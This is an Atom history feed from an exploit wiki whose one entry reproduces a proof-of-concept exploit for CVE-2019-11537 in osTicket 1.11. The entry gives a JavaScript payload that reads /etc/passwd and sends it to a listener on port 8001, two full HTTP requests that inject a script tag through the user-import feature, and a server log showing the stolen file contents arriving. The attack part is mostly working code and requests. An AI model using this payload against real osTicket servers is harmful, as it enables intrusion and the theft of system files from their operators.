<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-11537 osTicket 1.11 XSS&amp;本地文件包含漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T14:36:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E&amp;diff=2020&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion # Date: 09.04.2019 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus # Cont...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E&amp;diff=2020&amp;oldid=prev"/>
		<updated>2021-05-02T04:40:28Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion # Date: 09.04.2019 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus # Cont...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File&lt;br /&gt;
Inclusion&lt;br /&gt;
# Date: 09.04.2019&lt;br /&gt;
# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus&lt;br /&gt;
# Contact: https://pentest.com.tr&lt;br /&gt;
# Vendor Homepage: https://osticket.com&lt;br /&gt;
# Software Link: https://github.com/osTicket/osTicket&lt;br /&gt;
# References: https://github.com/osTicket/osTicket/pull/4869&lt;br /&gt;
#             https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html&lt;br /&gt;
# Version: v1.11&lt;br /&gt;
# Category: Webapps&lt;br /&gt;
# Tested on: XAMPP for Linux&lt;br /&gt;
# Description: This is exploit proof of concept as XSS attempt can&lt;br /&gt;
# lead to an LFI (Local File Inclusion) attack at osTicket.&lt;br /&gt;
##################################################################&lt;br /&gt;
# PoC&lt;br /&gt;
&lt;br /&gt;
# There are two different XSS vulnerabilities in the &amp;quot;Import&amp;quot;&lt;br /&gt;
field on the Agent Panel - User Directory field. This vulnerability&lt;br /&gt;
causes a different vulnerability. The attacker can run the malicious&lt;br /&gt;
JS file that he uploads in the XSS vulnerability. Uploaded JS files&lt;br /&gt;
can be called clear text. Therefore, attackers do not have to use&lt;br /&gt;
a different server to perform an attack. Then it is possible to&lt;br /&gt;
create &amp;quot;Local File Inclusion&amp;quot; vulnerability too.&lt;br /&gt;
&lt;br /&gt;
The attacker can upload a JS file as follows.&lt;br /&gt;
------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
function readTextFile(file)&lt;br /&gt;
{&lt;br /&gt;
    var rawFile = new XMLHttpRequest();&lt;br /&gt;
    rawFile.open(&amp;quot;GET&amp;quot;, file, false);&lt;br /&gt;
    rawFile.onreadystatechange = function ()&lt;br /&gt;
    {&lt;br /&gt;
        if(rawFile.readyState === 4)&lt;br /&gt;
        {&lt;br /&gt;
            if(rawFile.status === 200 || rawFile.status == 0)&lt;br /&gt;
            {&lt;br /&gt;
                var allText = rawFile.responseText;&lt;br /&gt;
                allText.src = 'http://localhost:8001' +&lt;br /&gt;
rawFile.responseText;&lt;br /&gt;
                document.body.appendChild(allText);&lt;br /&gt;
            }&lt;br /&gt;
        }&lt;br /&gt;
    }&lt;br /&gt;
    rawFile.send(null);&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
readTextFile(&amp;quot;/etc/passwd&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
# Smilar JS File Link;&lt;br /&gt;
&lt;br /&gt;
/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&lt;br /&gt;
&amp;amp;expires=1554854400&amp;amp;signature=be5cea87c37d7971e0c54164090a391066ecbaca&amp;amp;id=36&amp;quot;&lt;br /&gt;
&lt;br /&gt;
After this process, we can run the JS file in XSS vulnerability.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Our First Request for XSS to LFI;&lt;br /&gt;
------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
POST /upload/scp/users.php?do=import-users&lt;br /&gt;
Host: localhost&lt;br /&gt;
Content-Type: multipart/form-data; boundary=---------------------------[]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------[]&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;__CSRFToken__&amp;quot;&lt;br /&gt;
&lt;br /&gt;
8f6f85b8d76218112a53f909692f3c4ae7768b39&lt;br /&gt;
-----------------------------[]&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;pasted&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
-----------------------------[]&lt;br /&gt;
Content-Disposition: form-data; name=&amp;quot;import&amp;quot;; filename=&amp;quot;users-20190408.csv&amp;quot;&lt;br /&gt;
Content-Type: text/csv&lt;br /&gt;
&lt;br /&gt;
&amp;lt;script src=&amp;quot;&lt;br /&gt;
http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&amp;amp;expires=1554854400&amp;amp;signature=be5cea87c37d7971e0c54164090a391066ecbaca&amp;amp;id=36&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&lt;br /&gt;
-----------------------------[]--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Our Second Request for XSS to LFI;&lt;br /&gt;
------------------------------------------------------------------&lt;br /&gt;
POST /upload/scp/ajax.php/users/import HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
&lt;br /&gt;
__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&amp;amp;pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&amp;amp;undefined=Import+Users&lt;br /&gt;
------------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# After sending XSS requests,&lt;br /&gt;
# When the attacker listens to port 8001, he/she will receive a request as&lt;br /&gt;
follows.&lt;br /&gt;
&lt;br /&gt;
root@AkkuS:~# python -m SimpleHTTPServer 8001&lt;br /&gt;
Serving HTTP on 0.0.0.0 port 8001 ...&lt;br /&gt;
127.0.0.1 - - [09/Apr/2019 11:54:42] &amp;quot;GET / HTTP/1.1&amp;quot; 200 -&lt;br /&gt;
127.0.0.1 - - [09/Apr/2019 11:54:42] &amp;quot;GET&lt;br /&gt;
/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More]&lt;br /&gt;
            &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>